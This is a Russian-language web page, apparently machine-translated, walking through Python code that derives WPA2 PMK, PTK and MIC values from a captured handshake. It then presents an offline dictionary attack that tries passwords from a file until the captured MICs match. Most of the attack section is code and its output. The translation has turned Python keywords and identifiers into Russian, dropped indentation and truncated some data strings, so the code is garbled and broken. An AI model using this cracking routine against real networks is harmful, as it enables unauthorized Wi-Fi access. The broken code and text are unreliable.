Используя приведенный выше код Python, PTK, PMK и MIC вычисляются для данного захвата пакета. Следующий код на Python инициализирует переменные, содержащие поля, извлеченные из захвата пакета. Затем вычисляются MICS, PTK и PMK. Наконец, отображаются PTK и PMK, и вычисленные MIC сравниваются с фактическими MIC.

# Запустить краткий тест, показывающий вычисление PTK, PMK и MICS
# для четырехстороннего рукопожатия
def RunTest ():
    # общий ключ (PSK)
    psk = "12345678"
    #ssid name
    ssid = "Харконен"
    #ANonce
    aNonce = a2b_hex ('225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055')
    #SNonce
    sNonce = a2b_hex ("59168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570")
    #Authenticator MAC (AP)
    apMac = a2b_hex ("00146c7e4080")
    # Адрес станции: MAC клиента
    cliMac = a2b_hex ("001346fe320c")
    # Первый ВПК
    mic1 = "d5355382b8a9b806dcaf99cdaf564eb6"
    # Весь 802. 1x кадр второго сообщения рукопожатия с полем MIC, установленным на все нули
    data1 = a2b_hex ("0103007502010a0010000000000000000159168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de85700000000ac0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    # Второй ВПК
    mic2 = "1e228672d2dee930714f688c5746028d"
    # Весь кадр 802.1x третьего сообщения рукопожатия с полем MIC, установленным на все нули
    data2 = a2b_hex ( "010300970213ca00100000000000000002225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055192eeef7fd968ec80aee3dfb875e8222370000000000000000000000000000000000000000000000000000000000000000383ca9185462eca4ab7ff51cd3a3e6179a8391f5ad824c9e09763794c680902ad3bf0703452fbb7c1f5f1ee9f5bbd388ae559e78d27e6b121f")
    # Третий ВПК
    mic3 = "9dc81ca6c4c729648de7f00b436335c8"
    # Весь 802.1x кадр четвертого сообщения рукопожатия с полем MIC, установленным на все нули
    data3 = a2b_hex ("0103005f02030a00100000000000000002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    # Создать параметры для создания PTK, PMK и MIC
    A, B = MakeAB (aNonce, sNonce, apMac, cliMac)
    # Создайте MIC, PTK и PMK
    микрофоны, ptk, pmk = MakeMIC (psk, ssid, A, B, [data1, data2, data3])
    # Отобразить парный мастер-ключ (PMK)
    pmkStr = b2a_hex (pmk). декодировать (). верхний ()
    print ("pmk: \ t \ t" + pmkStr + '\ n')
    # Отображение парного переходного ключа (PTK)
    ptkStr = b2a_hex (ptk) .decode (). upper ()
    print ("ptk: \ t \ t" + ptkStr + '\ n')
    # Отобразите желаемый MIC1 и сравните с целевым MIC1
    mic1Str = mic1.upper ()
    print ("желаемый микрофон: \ t" + mic1Str)
    # Берем первые 128 бит из 160-битного хэша SHA1
    micStr = b2a_hex (микрофоны [0]). decode (). upper () [: - 8]
    print ("фактический микрофон: \ t" + micStr)
    print ('СООТВЕТСТВИЕ \ n', если micStr == mic1Str else 'MISMATCH \ n')
    # Отобразите желаемый MIC2 и сравните с целевым MIC2
    mic2Str = mic2.верхний ()
    print ("желаемый микрофон: \ t" + mic2Str)
    # Берем первые 128 бит из 160-битного хэша SHA1
    micStr = b2a_hex (микрофоны [1]). decode (). upper () [: - 8]
    print ("фактический микрофон: \ t" + micStr)
    print ('СООТВЕТСТВИЕ \ n', если micStr == mic2Str else 'MISMATCH \ n')
    # Отобразите желаемый MIC3 и сравните с целевым MIC3
    mic3Str = mic3. upper ()
    print ("желаемый микрофон: \ t" + mic3Str)
    # Берем первые 128 бит из 160-битного хэша SHA1
    micStr = b2a_hex (микрофоны [2]). decode (). upper () [: - 8]
    print ("фактический микрофон: \ t" + micStr)
    print ('MATCH \ n', если micStr == mic3Str else 'MISMATCH \ n')
    возвращение
 

Выходные данные для вышеуказанного кода показаны в следующем блоке кода.

pmk: EE51883793A6F68E9615FE73C80A3AA6F2DD0EA537BCE627B929183CC6E57925

ptk: EA0E404633C802450302868CCAA749DE5CBA5ABCB267E2DE1D5E21E57ACCD5079B31E9FF220E132AE4F6ED9EF1ACC88545825FC32EE55961395AE43734D6C107

желаемый микрофон: D5355382B8A9B806DCAF99CDAF564EB6
фактический микрофон: D5355382B8A9B806DCAF99CDAF564EB6
СООТВЕТСТВИЕ

желаемый микрофон: 1E228672D2DEE930714F688C5746028D
фактический микрофон: 1E228672D2DEE930714F688C5746028D
СООТВЕТСТВИЕ

желаемый микрофон: 9DC81CA6C4C729648DE7F00B436335C8
фактический микрофон: 9DC81CA6C4C729648DE7F00B436335C8
СООТВЕТСТВИЕ
 

Обратите внимание, что, поскольку MIC совпадают, предоставленный PSK правильный. Если вместо этого PSK изменяется на «abcdefgh», обратите внимание, что MIC больше не совпадают.

pmk: EBB5D703F8834A08D61A67A982FA009E08F747DD65D82C240169E604218B3ACF

ptk: 63E412CE67759BD5CEBD0F5B5A487CA155ADD51D771293E31C05BF05A3A98BCFE645F29203956E34C6A5B0CC2186B1161F643807349576CDB2FB1C158B03648F

желаемый микрофон: D5355382B8A9B806DCAF99CDAF564EB6
фактический микрофон: C2EE0E125962261C897A05E33B579F5C
НЕСООТВЕТСТВИЕ

желаемый микрофон: 1E228672D2DEE930714F688C5746028D
фактический микрофон: 6D60808DE292A32BAE1D381B3D295B2F
НЕСООТВЕТСТВИЕ

желаемый микрофон: 9DC81CA6C4C729648DE7F00B436335C8
фактический микрофон: D5F07A0FBC8F376541D46591FDA74470
НЕСООТВЕТСТВИЕ
 

Таким образом, можно угадать PSK и создать соответствующие MIC, пока не будет найдено совпадение.Этот тип атаки известен как офлайн-атака по словарю . Следующий код Python будет читать файл passwd.txt, содержащий по одному PSK на строку, и проверять каждый из них, пока список не будет исчерпан или пока не будет найден пароль.

 # Проверяет список паролей; если правильный найден
# печатает на экране и возвращает
#S: список паролей для проверки
#ssid: SSID точки доступа
#aNonce: ANonce как байтовый массив
#sNonce: SNonce как байтовый массив
#apMac: MAC-адрес точки доступа.
#cliMac: MAC-адрес клиента (он же станция)
# данные: 802.1x кадр второго сообщения с обнуленным полем MIC
# data2: кадр 802.1x третьего сообщения с обнуленным полем MIC.
# data3: кадр 802.1x четвертого сообщения с обнуленным полем MIC.
#targMic: MIC для сообщения 2
# targMic2: MIC для сообщения 3
# targMic3: MIC для сообщения 4
def TestPwds (S, ssid, aNonce, sNonce, apMac, cliMac, data, data2, data3, targMic, targMic2, targMic3):
# Предварительно вычисленные значения
A, B = MakeAB (aNonce, sNonce, apMac, cliMac)
# Переберите каждый пароль и проверьте каждый
для i в S:
mic, _, _ = MakeMIC (i, ssid, A, B, [данные])
v = b2a_hex (микрофон [0]).decode () [: - 8]
#First MIC не совпадает
если (v! = targMic):
Продолжать
# Первый MIC соответствует ... Попробуйте второй
mic2, _, _ = MakeMIC (i, ssid, A, B, [data2])
v2 = b2a_hex (mic2 [0]). decode () [: - 8]
если (v2! = targMic2):
Продолжать
#First 2 match ... Попробуйте последний
mic3, _, _ = MakeMIC (i, ssid, A, B, [data3])
v3 = b2a_hex (mic3 [0]). decode () [: - 8]
если (v3! = targMic3):
Продолжать
# Все совпадают
print ('!!! Пароль найден !!!')
print ('Желаемый MIC1: \ t \ t' + targMic)
print ('Вычисленный MIC1: \ t \ t' + v)
print ('\ nDesired MIC2: \ t \ t' + targMic2)
print ('Вычисленный MIC2: \ t \ t' + v2)
print ('\ nDesired MIC2: \ t \ t' + targMic3)
print ('Вычисленный MIC2: \ t \ t' + v3)
print ('Пароль: \ t \ t' + i)
вернуть я
return None

если __name__ == "__main__":

RunTest ()
# Прочитать файл паролей, содержащий
# пароли, разделенные новой строкой
с open ('passwd.txt ') как f:
S = []
для l в f:
S.append (l.strip ())
#ssid name
ssid = "Харконен"
#ANonce
aNonce = a2b_hex ('225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055')
#SNonce
sNonce = a2b_hex ("59168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570")
#Authenticator MAC (AP)
apMac = a2b_hex ("00146c7e4080")
# Адрес станции: MAC клиента
cliMac = a2b_hex ("001346fe320c")
# Первый ВПК
mic1 = "d5355382b8a9b806dcaf99cdaf564eb6"
# Весь 802.1x кадр второго сообщения рукопожатия с полем MIC, установленным на все нули
data1 = a2b_hex ("0103007502010a0010000000000000000159168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de85700000000ac0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
# Второй ВПК
mic2 = "1e228672d2dee930714f688c5746028d"
# Весь кадр 802.1x третьего сообщения рукопожатия с полем MIC, установленным на все нули
data2 = a2b_hex ( "010300970213ca00100000000000000002225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055192eeef7fd968ec80aee3dfb875e8222370000000000000000000000000000000000000000000000000000000000000000383ca9185462eca4ab7ff51cd3a3e6179a8391f5ad824c9e09763794c680902ad3bf0703452fbb7c1f5f1ee9f5bbd388ae559e78d27e6b121f")
# Третий ВПК
mic3 = "9dc81ca6c4c729648de7f00b436335c8"
# Весь 802.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Таблица 10.8. Обновление ключа группы

Тип дескриптора

254

Ключевая информация

Запрос, ошибка: 0

Безопасность: 1

MIC: 1

Подтверждение: 1

Установить: 1

Индекс: nn

Тип ключа: Группа

Тип дескриптора: 1

Длина ключа

32

Счетчик воспроизведения

<Текущее значение>

Ключевой одноразовый номер

EAPOL-Key IV

IV для шифрования данных ключа

RSC

Порядковый номер последнего зашифрованного группового сообщения

000 Идентификатор ключа

901 0

Ключ MIC

Значение MIC

Длина ключевых данных

32

Ключевые данные

<зашифрованные

Март 2024
ПнВтСрЧтПтСбВс
 123
45678910
11121314151617
18192021222324
25262728293031
2024 © Все права защищены. Карта сайта